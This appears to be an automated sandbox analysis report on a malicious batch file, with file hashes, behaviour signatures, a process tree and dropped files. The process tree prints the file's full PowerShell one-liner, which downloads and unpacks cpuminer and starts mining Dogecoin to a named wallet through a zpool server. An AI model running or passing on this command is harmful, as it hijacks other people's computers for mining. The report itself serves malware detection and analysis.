b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1792s
max time network
1795s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
04/02/2024, 14:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	4980	powershell.exe
4	4980	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2084	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2084	cpuminer-sse2.exe
2084	cpuminer-sse2.exe
2084	cpuminer-sse2.exe
2084	cpuminer-sse2.exe
2084	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4980	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 780 wrote to memory of 4980	780	cmd.exe	74
PID 780 wrote to memory of 4980	780	cmd.exe	74
PID 4980 wrote to memory of 3096	4980	powershell.exe	75
PID 4980 wrote to memory of 3096	4980	powershell.exe	75
PID 3096 wrote to memory of 2084	3096	cmd.exe	77
PID 3096 wrote to memory of 2084	3096	cmd.exe	77

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4980
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3096
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2084

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mgqmn123.bw4.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.0MB

MD5
143263d750f7beebb7f163ab38b6922b

SHA1
eb3cb57c5c1015c9f7a21f41839f5a37a65d2432

SHA256
c61aedc61e191f086421cb5daa701322fe035b7214b056893ba62709ebb3b111

SHA512
df04e599db871c27c40a072511c0e914b9d312a5ffde5418e8f9bc3223eac01cbbcd09c8587c941dba7b98b999940436cce0351a2b39c9e3dd3c71f0a5e9baa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.0MB

MD5
5a25cdff4a5c5973f0c8aecf63e65035

SHA1
ee52436151c1b5fe036f0120cc64a3822fc8cac7

SHA256
da022691819b83909ac9de8676ca02b8fb84e14bacb6d9558238b5b46a719984

SHA512
5ab277132ba7ce2f993badc6f23321b27568a52120490816c7c30af472fbaa9732380af35aa62167fd27ed91ae03f16e8c206424c271db1af8a324db7a356f8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
528f914d14c8d1ab330f01354c3d9112

SHA1
82dfb21884ccaab1f2a39c06c34d1485a996fa80

SHA256
58c84c95553a336c8819a45138d05fd6dfeb027a771b520c6fc1003a69e3b31c

SHA512
cfaef754e55e5bd229b9e9ba86549c4a1404371c02cbbc3e581100c793b3d9c35c15766a2c45bc5809318c5e49f7836780373e0f31ba39cac2f8b25992edc691

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.3MB

MD5
85ec5b19a3d0f87a1f5069cca9633b6d

SHA1
9f904a477f9a4304b237490f4e04790971431dcb

SHA256
01cd95129028f1485318a3dfb476456c205fd3922c5df736b1725f0a7059322f

SHA512
aba4fea403b5451f5c42018144346011886ab4cf82954d5569dbc5cbcaf993f89ac4312ed54f9fbbc283d22cec2e779383460deb994cbcce418e718f915cc815

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.1MB

MD5
03ae1346c99a66fcbd06c3a56898820a

SHA1
cf57878eb1c3523d08468ba3e9e65a063c24d902

SHA256
bdb28d28d4f6093c2bbf0cbdf1b2edaf325ad34c214cde4123437896488dc445

SHA512
b1e6f93db804c65f996ae29123a601ee95830391d9f5b73608962cbcd25a9082f1b1f9a6e732e5f84bfa3bd7207101edf9d076445370150ae58c9dcace634260

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
731KB

MD5
90211c3fb1aee5cbddcc3321604b1949

SHA1
2a51b6e9d83ea3a2931434eb704f860ee160ac74

SHA256
618465ac3dc1db2168f3184fda85de2afd7eb303fd3531b1c8a2890543739378

SHA512
a8ced8e5eb3e73de44b2d5ce36e826a67acd89fab71f5e212d6660a4988c3eec743d0c0db9e782120e37ec35ab0561b01415e90c86913dfc345418f6a1a3f5ed

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2084-129-0x00000000010F0000-0x00000000029A5000-memory.dmp

Filesize
24.7MB

Download
memory/2084-125-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2084-188-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/2084-185-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2084-173-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/2084-170-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2084-165-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2084-158-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/2084-155-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2084-150-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2084-143-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/2084-140-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2084-130-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2084-126-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2084-127-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2084-128-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/4980-28-0x0000017367CB0000-0x0000017367CC0000-memory.dmp

Filesize
64KB

Download
memory/4980-10-0x0000017367CB0000-0x0000017367CC0000-memory.dmp

Filesize
64KB

Download
memory/4980-6-0x0000017367B30000-0x0000017367B52000-memory.dmp

Filesize
136KB

Download
memory/4980-7-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

Filesize
9.9MB

Download
memory/4980-4-0x0000017367BA0000-0x0000017367C32000-memory.dmp

Filesize
584KB

Download
memory/4980-9-0x0000017367DD0000-0x0000017367EDE000-memory.dmp

Filesize
1.1MB

Download
memory/4980-8-0x0000017367CB0000-0x0000017367CC0000-memory.dmp

Filesize
64KB

Download
memory/4980-5-0x000001734FAC0000-0x000001734FAD0000-memory.dmp

Filesize
64KB

Download
memory/4980-13-0x0000017367F60000-0x0000017367FD6000-memory.dmp

Filesize
472KB

Download
memory/4980-33-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

Filesize
9.9MB

Download
memory/4980-31-0x0000017367C90000-0x0000017367CA6000-memory.dmp

Filesize
88KB

Download
memory/4980-112-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

Filesize
9.9MB

Download
memory/4980-69-0x0000017367B10000-0x0000017367B1A000-memory.dmp

Filesize
40KB

Download
memory/4980-56-0x0000017367EE0000-0x0000017367EF2000-memory.dmp

Filesize
72KB

Download
memory/4980-35-0x0000017367CB0000-0x0000017367CC0000-memory.dmp

Filesize
64KB

Download
memory/4980-34-0x0000017367CB0000-0x0000017367CC0000-memory.dmp

Filesize
64KB

Download